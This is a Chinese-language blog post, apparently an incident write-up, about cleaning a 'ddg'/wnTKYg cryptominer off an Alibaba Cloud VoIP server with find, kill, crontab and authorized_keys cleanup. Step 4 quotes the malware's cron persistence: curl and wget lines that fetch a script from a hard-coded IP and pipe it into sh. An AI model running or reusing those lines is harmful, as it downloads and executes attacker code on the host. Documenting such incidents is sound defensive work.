公司有臺做voip的服務器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去查看進程,top了下(見下圖)
這個叫wnTKYg的進程很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G內存的阿里雲主機)既然被***了,那就得幹掉它,下面是解決過程:
1:第一步要先找到這個wnTKYg文件實體,對了還有一個叫ddg.2020的進程。
[root@alitest ~]$ find / -name wnTKYg
/tmp/wnTKYg
[root@alitest ~]$ find / -name ddg*
/tmp/ddg.20202:接着把這兩個文件的可執行權限拿掉。
[root@alitest ~]$ cd /tmp
[root@alitest /tmp]$ chmod -x ddg.2020 wnTKYg3:殺掉這該死的進程。
[root@alitest /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -94:清除無用的定時任務。
[root@alitest /tmp]$ crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh這是挖礦程序生成的定時任務,不清除掉待會進程又起來了。
[root@alitest /tmp]$ echo > /var/spool/cron/root因爲這臺機器上沒有做定時任務,所以就直接清除掉了,如果有其他在用的定時任務,不要這樣哦。
5:刪除挖礦程序。
[root@alitest /tmp]$ rm -f ddg.2020 wnTKYg6:清除.ssh/下的公鑰文件。
[root@alitest ~/.ssh]$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV
.................這臺機器並沒有上傳過公鑰文件,所以這就是***者留下的咯,刪掉刪掉。
[root@alitest ~/.ssh]$ rm -f authorized_keys至此,***就已經清理完畢了。
小結:
在網上查了一下,發現大部分挖礦***都發生在redis上,而我這臺服務器並沒有部署redis,而是當時廠家給裝的一套voip環境,因此我懷疑是voip軟件的漏洞導致了此次事件,之後再聯繫廠家看看。通過這次服務器被***的案例,再一次印證了安全的重要性,安全無小事,繼續努力吧。
參考文檔:
http://blog.csdn.net/zimou5581/article/details/73064878
http://blog.csdn.net/u013082989/article/details/51971121